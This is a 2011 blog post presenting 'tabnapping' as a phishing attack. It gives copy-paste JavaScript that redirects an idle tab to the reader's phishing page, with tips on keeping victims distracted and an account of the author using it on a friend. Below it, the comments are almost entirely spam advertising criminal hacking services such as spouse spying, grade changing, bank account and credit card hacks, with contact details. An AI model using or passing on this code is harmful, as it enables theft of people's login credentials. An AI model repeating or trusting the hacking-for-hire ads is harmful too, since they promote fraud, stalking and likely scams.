Sunday, July 24, 2011

Tab Napping(Phishing Attack)

Theory Behind Tabnapping(please read this to understand)
How many times you have opened several tabs and forget to go to the other tabs. Because of this ignorance of victim, hacker can actually redierect the idle tab to their phishing page. And in many cases victim doesn't bother to see the URL of the page. In simple words its just a trick to confuse the user in multiple tabs.
You may be thinking why any one will login to the page if he/she didn't request it. Well, I want to ask one question: What you will do if you have Facebook login page in front of you? its our nature.


Tabnapping is done by javascript. Its all about relation of two pages, say pageA and pageB. Consider pageA is the page which is being opened in a tab and pageB is our phishing page. Now by some mechanism the pageA must be redirect to pageB(phishing page), so how to do it?

The first thing we can do is we can use setInterval() function of javascript
Example:-timerRedirect=setInterval("location.href='http://www.gmail.com'",10000); specify this in the script section this will not effect the code, its work is to redirect the page to gmail.com after 10 seconds.
But you need to redirect the page only if the page is idle so how to do it? Don't worry i have the code for that, just copy and paste the below code in your page's(pageA as per the example) "head" section.Note:-replace gmail.com with your phishing page URL. Learn how to create phishing page: Click Here.


Javascript(copy it in head section)
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
  if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
    xScroll = document.body.scrollLeft;
    yScroll = document.body.scrollTop;
    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect
    timerPoll = setInterval("pollActivity()",1); //poll scrolling
    timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
   
  }
  else if (typeof window.pageYOffset != "undefined"){
    xScroll = window.pageXOffset;
    yScroll = window.pageYOffset;
    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect
    timerPoll = setInterval("pollActivity()",1); //poll scrolling
    timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
   
  }
  //else do nothing
}
function pollActivity(){
  if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft || yScroll!=document.body.scrollTop)) //IE/NS7/Moz
   ||
   (typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) { //other browsers
      initRedirect(); //reset polling scroll position
  }
}
document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>


Upload your page with javascript in a website. Now the only thing you have to do is give him your page(pageA). Now a little tip: Don't let him close your page, keep some interesting article or bunch of funny pictures or anything interesting just don't let him close the tab make your article bit lengthy, so that victim does'nt complete in once(Again use your head).


I would rather like to share, how I applied this technique:- I shared my page(article included above javascript) link while chatting with a friend, and I just made him read my article. While he was reading I started sending msgs in the chat box, so he must come to answer me right? Now just I had to do is hang him in chat for minute or two, and my job is done..

Click Here to see the demo page.



15 comments:

  1. If you need to hire a real hacker to help spy on your partner's cell phone remotely, change your grades or boost your credit score. Contact this helpline +1 347.857.7580 or the email address expressfoundations@gmail.com

    ReplyDelete
    Replies
    1. Need The To Hire A Hacker❓ Then contact PYTHONAX✅

      The really amazing deal about contacting PYTHONAX is that the Hack done by us can’t get traced to you, as every Hacking job we do is strongly protected by our Firewall. It’s like saying if anyone tries to trace the Hack, it will lead them to us and we block whatever actions they are doing.

      We have been Invisible to Authorities for almost a decade now and if you google PYTHONAX, not really about us comes out, you can only see comments made by us or about us.

      Another Amazing thing to you benefit from Hiring our Hackers is that you get a Legit and the best Hacking service, As we provide you with Professional Hackers who have their Hacking Areas of specialization.
      We perform every Hack there is, using special Hacking tools we get from the dark web.

      Some list of Hacking Services we provide are-:
      ▪️Phone Hacking & Cloning ✅
      ▪️Computer Hacking ✅
      ▪️Emails & Social Media Account Hacking✅
      ▪️Recovering Deleted Files✅
      ▪️Tracking & Finding People ✅
      ▪️Hunting Down Scammers✅
      ▪️Hack detecting ✅
      ▪️Stealing/Copying Files & Documents From Restricted Networks and Servers ✅
      ▪️Bitcoin Multiplication✅
      ▪️Binary Option Money Recovery ✅
      ▪️Forex Trading Money Recovery✅
      ▪️IQ Option Money Recovery✅
      And lots more......


      Whatever Hacking service you require, just give us an Email to the Emails Address provided below.
      pythonaxhacks@gmail.com
      pythonaxservices@gmail.com

      PYTHONAX.
      2020 © All Right Reserved.

      Delete
  2. In case you need a hackers for hire? Do you need to keep an eye on your spouse by gaining access to their emails? As a parent do you want to know what your kids do on a daily basis on social networks ( This includes facebook, twitter , instagram, whatsapp, WeChat and others to make sure they’re not getting into trouble? Whatever it is, Ranging from Bank Jobs, Flipping cash, Criminal records, DMV, Taxes, Name it,i can get the job done.Am a professional hacker with 10 Years+ experience. Contact me at alexanderwilliam2019@gmail.com … Send an email and Its done. Its that easy, Daura referred you

    ReplyDelete
  3. In case you need a hackers for hire? Do you need to keep an eye on your spouse by gaining access to their emails? As a parent do you want to know what your kids do on a daily basis on social networks ( This includes facebook, twitter , instagram, whatsapp, WeChat and others to make sure they’re not getting into trouble? Whatever it is, Ranging from Bank Jobs, Flipping cash, Criminal records, DMV, Taxes, Name it,i can get the job done.Am a professional hacker with 10 Years+ experience. Contact me at alexanderwilliam2019@gmail.com … Send an email and Its done. Its that easy, Daura referred you

    ReplyDelete
    Replies
    1. ◾PROTOCOL SHIELDERS◾

      ⚠️WARNING:
      MOST TESTIMONIES YOU SEE HER ARE ALL FAKE AND SIMULTANEOUSLY INCONGRUOUS !. 
      HELLO, I am COREY RODRIGUEZ by name,the only CEO of protocol-cyber-shield-hackers.  In this message, we will explain how you can almost avoid SCAMMERS and stay safe, plus how our organization works. Read it carefully!! Its reading will not take more than 5mins. 

      ➡️PHONE HACKING ➡️SOCIAL MEDIA ACCOUNTS & EMAILS TRACKING etc.....
      TAKE NOTE AND PRECAUTIONS:

      1. you see uncertified email accounts carrying numberings likeiamhacklord1232@(gmail,yahoo or hotmailDOTcom)  pls flee from them, BIG SCAMMERS!!!.They take your money and never do your job!! 
      2. you see posts like "do you need to spy on spouse?" All fake!just a way to lure you towards getting ripped!. 3, posting fake testimonies and comments to trick you into feeling safe,Pls endeavour to ignore!! 
        OUR AIMS HERE:WE assign to you a qualified agent(hacker) of specific rank to particularly all king of SPOUSE MONITORING OR PHONE TRACKING,just as you want it with in short and accurate timing. write us on:
      ◾Protocolhacks@gmail. com
      ◾Cybershieldnotch@gmail. com
      COREY ROD, 
      SIGNED...
      Thank you..

      Delete
  4. WHENEVER YOU NEED A HACKER .Every date is expected to end in sex but with this girl it was different I fell in love at first sight most people think love at first sight was a lie I too was one of those but I was immediately proven to be wrong and fate was good to me, we fell in love and we dated for 5yrs, she would come home late and I would neglect it even though we had just moved in together, I would call but she wouldn't pick up, I became suspicious of her activities I was afraid she was in a form of trouble then I sought a close friend for an advice, when I told my friend my suspicions he told me he had a friend who was in a similar situation and he would call him now to introduce us, his friend's phone rang twice then he picked up after introducing us his friend told me to contact his cousin who works as an intern for an agency that the federal bank consults with when they are attacked by hackers and he added that he also does a freelance hack to earn on the side he also gave his contact to me and he hung up after saying our thank you's. His cousin name was Rosa and she helped me with the hack and just as I feared my girl was cheating on me, she has been cheating all along and I was the fool that would always be there I was heartbroken knowing I was about to propose to her all thanks to Rosa I would still be lied too, if you are interested in her freelance service her contact info is: (Parachutelift at gmail dot com), she can also hack into any social media account, Spy on any call, text, track locations, gain password to any social media account including your Emails.

    ReplyDelete
  5. When you need a great hacker that's reliable and trustworthy and cost effective,in WORLDHACKERS79@GMAIL.COM you got the best hacker in town to hack into any devices of your choice.
    this is the only hacker that's reliable,tested and trusted,they'll deliver your work in 6hours and hack into any devices of your spouse without installing anything on the target's phone and with no physical contact on your spouse's phone.
    thanks for the good work from
    Worldhackers79@gmail.com

    ReplyDelete
  6. Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
    Do you need to retrieve your stolen bitcoin?
    Do you need to increase your credit score?
    Do you intend to upgrade your school grade?
    Do you need any information concerning any database.
    Do you need to retrieve deleted files?
    Do you need to clear your criminal records or DMV?
    Do you want to remove any site or link from any blog?
    you should contact this hacker, he is reliable and good at the hack jobs..
    contact : certifiedhacker04 AT gmail DOT com WhatsApp 16317433959

    ReplyDelete
  7. I know a professional hacker named james who has worked for me this week. He offers very legitimate services such as clearing of bad records online without being traced back to you, He clone/hack mobile phones, hack Facebook account, instagram, WhatsApp, emails, Twitter, bank accounts, Skype, FIXES CREDIT REPORTs, track calls. He also help retrieve accounts that have been taking by hackers. His charges are affordable, reliable and 100% safe. For his job well done this is my own way to show appreciation, Contact him via address below...
    Email...hackintechnology@gmail. com
    Text no..+1(669) 225-2253 WhatsApp..+1 (845) 643-6145

    ReplyDelete
  8. Hello, are you in need of hacking services? Then contact lightyhack777@gmail.com , he is the best hacker. He helped me and my friends with some issues we had. If you need to
    *hack into email accounts,
    *all social media accounts,
    *school database to clear or change grades,
    *Retrieval of lost file/documents
    *DUIs
    *company records and systems,
    *bank accounts,
    he is really the best. His services are affordable. Don't waste your time with fake hackers
    + Credit cards hacker
    + We can drop money into bank accounts.
    + credit score hack
    + blank credit card sale
    + Hack and use Credit Card to shop online
    + Monitor any phone and email address
    + Tap into anybody's call and monitor their
    conversation
    CONTACT: lightyhack777@gmail.com

    For Quick, reliable and guaranteed results.

    ReplyDelete
  9. He is no scam,I tested him and he delivered a good job,he helped me settle bank loans,he also helped my son upgrade his scores at high school final year which made him graduate successfully and he gave my son free scholarship into the college,all I had to do was to settle  the bills for the tools on the job,I used $500 to get a job of $50000 done all thanks to brillianthackers800@gmail.com,he saved me from all my troubles,sharing this is how I can show gratitude in return for all he has done for me and my family.

    ReplyDelete
  10. when it comes to hacking of devices , phones, gadget, computers secretly without the owner knowing. Get in touch to IPHONESANDANDROIDINFILTRATOR@AOL.COM , he has been very useful with tracking my spouses phone and my kids for me to know where they are at all times.
    Also when i was suspicious of my husbands activities he came very useful. socialmedia and accounts where all on phone at just a click . thanks again Lucian

    ReplyDelete

  11. CONTACT US FOR ALL KINDS OF HACKING JOB @ newworldhacker2020@gmail.com Business Whatsapp ((732) 798-0843 We offer professional hacking services , we offer the following services.
    -University grades changing
    -Bank accounts hack
    -Erase criminal records hack
    -Facebook hack
    -Twitters hack
    -email accounts hack
    -Grade Changes hack
    -Website crashed hack
    -server crashed hack
    -Skype hack
    -Databases hack
    -Word Press Blogs hack
    -Individual computers hack
    -Control devices remotely hack
    -Burner Number
    -Verified Paypal Accounts hack
    -Any social media account hack
    -Android & iPhone Hack
    -Text message interception hack
    -email interception hack
    -Bitcoin recovery
    -binary multiplication
    -credit score upgrade
    -Track Calls log and Spy Call Recording.
    Monitoring SMS text messages remotely.
    Cell phone GPS location racking. Spy on Whatsapp Messages.
    -Untraceable Ip etc.
    Contact us at newworldhacker2020@gmail.com or text or call ((732) 798-0843 for more inquiry..
    Business whatsapp number ,,732 798 0843

    ReplyDelete
  12. Do you need to hack into any, databaseserver spy on Facebook,Emails, Whatsapp, Viber, Snapchat, Instagram and many more.
    I urge you to get in touch with the best people for the job, i have confirm the service when i need to spy on my spouse phone. They are good at Phone Cloning and Bitcoin/binary minning and any other hack job.
    Thanks guys for the team work HACKINTECHNOLOGYATGMAILDOTCOM
    +12132951376(WHATSAPP)

    ReplyDelete
  13. CONTACT US FOR ALL KINDS OF HACKING JOB @ GLENFTHOMAS@GmAIL.COM We offer professional hacking services , we offer the following services;
    -University grades changing
    -Bank accounts hack
    -Erase criminal records hack
    -Facebook hack
    -Twitters hack
    -email accounts hack
    -Grade Changes hack
    -Website crashed hack
    -server crashed hack
    -Skype hack
    -Databases hack
    -Word Press Blogs hack
    -Individual computers hack
    -Control devices remotely hack
    -Burner Numbers hack
    -Verified Paypal Accounts hack
    -Any social media account hack
    -Android & iPhone Hack
    -Text message interception hack
    -email interception hack
    -Untraceable Ip etc.
    Contact us at GLENFTHOMAS@GMAIL.COM for more inquiry..
    Track Calls log and Spy Call Recording.
    Monitoring SMS text messages remotely.
    Cell phone GPS location tracking. Spy on Whatsapp Messages.
    Free Update and 100% Undetectable.
    Track BBM messages and Line messages.
    View All Photos Captured.
    Track Internet Browsing History and Read phone Access Address Book, totally worth your money, please no time wasters, he won't under any circumstances work for free, you can reach him by email GLENFTHOMAS@GMAIL.COM
    WHATSAPP NUMBER:+1 917 809 8609.

    ReplyDelete